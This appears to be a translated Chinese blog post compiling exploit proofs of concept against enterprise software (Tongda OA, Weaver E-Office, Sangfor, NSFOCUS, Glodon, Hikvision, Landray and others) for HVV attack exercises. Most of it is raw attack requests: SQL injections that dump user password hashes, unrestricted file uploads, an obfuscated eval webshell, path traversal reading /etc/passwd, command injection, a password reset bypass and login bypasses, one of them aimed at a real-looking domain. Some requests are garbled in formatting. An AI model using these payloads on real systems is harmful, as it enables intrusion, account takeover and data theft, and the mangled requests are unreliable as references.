First, a bit of security industry news....
Still the same saying: "Without cybersecurity, there is no national security."
Hard strike! State security organs crack a US CIA espionage case
HVV operations are still necessary.
HVV (network protection operation) tactics and techniques
Looks like everyone likes this playbook.
Thinking it through is too tiring; let AI write it instead.
Let's get down to business.
Tongda OA SQL injection vulnerability CVE-2023-4165 POC
GET/general/system/seal_manage/iweboffice/delete_seal.php? DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count()%20fr om%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1HTTP/1.1Host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2AcceptEncoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests:11GET /general/system/seal_manage/dianju/delete_log.php? DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count()%20f
Weaver OA code execution EXP
Weaver E-Office 9 has a code-level vulnerability: the file /inc/jquery/uploadify/uploadify.php is flawed, and its handling of the Filedata parameter allows unrestricted file upload.
Affected: Weaver E-Office 9.0
Weaver E-Office 9 unauthenticated (front-end) file inclusion
Wangshen (网神) SecGate 3600 firewall, obj_app_upfile arbitrary file upload
POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: /
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type:multipart/form-data;boundary=—-WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition:form-data; name=”MAX_FILE_SIZE”
10000000
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition:form-data; name=”upfile”; filename=”vulntest.php”
Content-Type: text/plain
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name=”submit_post”
obj_app_upfile
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name=”hash“
0b9d6b1ab7479ab69d9f71b05e0e9445
——WebKitFormBoundaryJpMyThWnAxbcBBQc–
Webshell path: attachements/xxx.php
Wangshen (网神) SecSSL 3600 secure access gateway, arbitrary password change
POST /changepass.php?type=2
Cookie:admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={“this_name”:”test”,”subAuthId”:”1”}
old_pass=&password=Test123!@&repassword=Test123!@
Sangfor Application Delivery command execution
POST /rep/login
Host:URL
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
Sangfor report module arbitrary file read
GET/report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:85
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
NSFOCUS SAS security audit system arbitrary file read vulnerability
/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd
NSFOCUS SAS bastion host Exec remote command execution vulnerability
/webconf/Exec/index?cmd=<command to execute>
Glodon back-end file upload
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept:text/html,application/xhtml+xml, image/jxr, /
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent:Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: /
Origin: http://10.10.10.1
Cookie:
Connection: close
Content-Length: 421
——WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition:form-data; filename=”1.aspx”;filename=”1.jpg”
Content-Type: application/text
<%@ Page Language=”Jscript” Debug=true%>
<%
var FRWT=’XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD’;
var GFMA=Request.Form(“qmq1”);
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>
——WebKitFormBoundaryFfJZ4PlAZBixjELj–
Glodon OA SQL injection
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept:text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type:application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1’ UNION ALL SELECT top 1812 concat(F_CODE,’:’,F_PWD_MD5)from T_ORG_USER –
Tongda
CVE-2023-4166
Affected scope: Tongda OA versions before 11.10
POST request packet
Kingsoft Office
WPS command execution
WPS affected scope: WPS Office 2023 Personal Edition < 11.1.0.15120
WPS Office 2019 Enterprise Edition < 11.8.2.12085
Start an HTTP server in the directory containing 1.html, listening on port 80, and modify the hosts file (hard-coded for testing).
Triggering the vulnerability requires a domain matching the pattern clientweb.docer.wps.cn.{xxxxx}wps.cn; cloudwps.cn has no relation to wps.cn.
The code block is below. (For the original PDF, add me on WeChat.)
Hikvision
HIKVISION iSecure Center integrated security management platform file upload
POST request packet
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Length: 258
Content-Type:multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
–e54e7e5834c8c50e92189959fe7227a4
Content-Disposition:form-data;name=”file”; filename=”../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt”
Content-Type: application/octet-stream
9YPQ3I3ZS
Landray OA
Unauthenticated (front-end) code execution
POST/sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type:application/x-www-form-urlencoded
var={“body”:{“file”:”file:///etc/passwd”}}
DBAPPSecurity MingYu operations audit and risk control system (bastion host) arbitrary user registration
POST/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie:LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua:”NotA;Brand”;v=”99”,”Chromium”;v=”100”,”Google Chrome”;v=”100”
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: “Windows”
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
HAND SRM tomcat.jsp login bypass vulnerability POC
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
After visiting each of them, access the back end directly.
Chenxin Jingyun endpoint security management system login SQL injection vulnerability POC
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin’and(select*from(select+sleep(3))a)=’
Yonyou mobile management system uploadApk.do arbitrary file upload vulnerability
To be continued......